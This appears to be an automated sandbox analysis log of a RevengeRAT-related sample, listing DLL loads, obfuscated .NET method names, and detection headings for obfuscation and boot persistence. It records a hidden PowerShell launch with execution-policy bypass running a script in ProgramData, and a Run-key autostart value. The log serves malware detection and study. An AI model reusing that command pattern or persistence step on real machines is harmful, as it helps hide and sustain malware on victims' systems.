                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: C:\Users\pc\Desktop\RevengeRAT C# Stub\Lime\obj\Debug\Lime.pdb source: powershell.exe, 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                    Source: Binary string: ClassLibrary1.pdb source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ClassLibrary1.pdb8 source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8800BD pushad ; iretd 0_2_00007FFD9B8800C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B888FF2 push FFFFFFE8h; ret 0_2_00007FFD9B888FF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B88D6AA push cs; ret 0_2_00007FFD9B88D6C7
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, Class1.csHigh entropy of concatenated method names: 'cSAthpF4q', 'BOA2PRCtE', 'tYabmA30h', 'pTKP9IMri', 'wi1WuIcZX', 'lGM7L0uUo', 'IRXGT8rNp', 'rcSIlKjDx', 'CuM4370cF', 'oflQqQ9pd'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, bgdjQDs74EtOPCyOnc9.csHigh entropy of concatenated method names: 'ztJRZrWr4a', 'K90RsN0ip4', 'TVoRqHCp3v', 'akUR5gUVxg', 'E0rRTe5IDX', 'wNFRHPocfa', 'U7oRyf6lHv', 'WuEqZ2VqRN', 'Ou5R6aBt7f', 'YL5RRASrwO'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, npfGFrAepxjjv4umNO.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'FmT0bHnWB', 'ToString', 'p4mLwFNhb', 'nWY9S3nUn', 'oseCHUCWU9c0LVx917l', 'MdXtvCC71GIt7mZcyMN', 'ttixWqCGM4jIQ4p80sH', 'cV1P8uCIT75RvPTTmnG'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.csHigh entropy of concatenated method names: 'oXvqawAJnXAG2CkbW5J', 'bjv4ebAOSFAlevNOxLW', 'Qn6Z1gmbcG', 'u5Vtx4A5qBcKwIV5QMO', 'ty2sw7ATn0Z42iKQpHN', 'POdg9nAHLwKLRQfwFU8', 'SQwAgDAyMHdFgP5t1qK', 'CWR6GGA6mIbV1rdPKRw', 'tcBqMmARfsS6ElEbqDn', 'MjacT49Ikb'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, Class1.csHigh entropy of concatenated method names: 'cSAthpF4q', 'BOA2PRCtE', 'tYabmA30h', 'pTKP9IMri', 'wi1WuIcZX', 'lGM7L0uUo', 'IRXGT8rNp', 'rcSIlKjDx', 'CuM4370cF', 'oflQqQ9pd'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, bgdjQDs74EtOPCyOnc9.csHigh entropy of concatenated method names: 'ztJRZrWr4a', 'K90RsN0ip4', 'TVoRqHCp3v', 'akUR5gUVxg', 'E0rRTe5IDX', 'wNFRHPocfa', 'U7oRyf6lHv', 'WuEqZ2VqRN', 'Ou5R6aBt7f', 'YL5RRASrwO'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, npfGFrAepxjjv4umNO.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'FmT0bHnWB', 'ToString', 'p4mLwFNhb', 'nWY9S3nUn', 'oseCHUCWU9c0LVx917l', 'MdXtvCC71GIt7mZcyMN', 'ttixWqCGM4jIQ4p80sH', 'cV1P8uCIT75RvPTTmnG'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.csHigh entropy of concatenated method names: 'oXvqawAJnXAG2CkbW5J', 'bjv4ebAOSFAlevNOxLW', 'Qn6Z1gmbcG', 'u5Vtx4A5qBcKwIV5QMO', 'ty2sw7ATn0Z42iKQpHN', 'POdg9nAHLwKLRQfwFU8', 'SQwAgDAyMHdFgP5t1qK', 'CWR6GGA6mIbV1rdPKRw', 'tcBqMmARfsS6ElEbqDn', 'MjacT49Ikb'

                    Boot Survival

                    barindex
                    Creates autostart registry keys with suspicious names
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
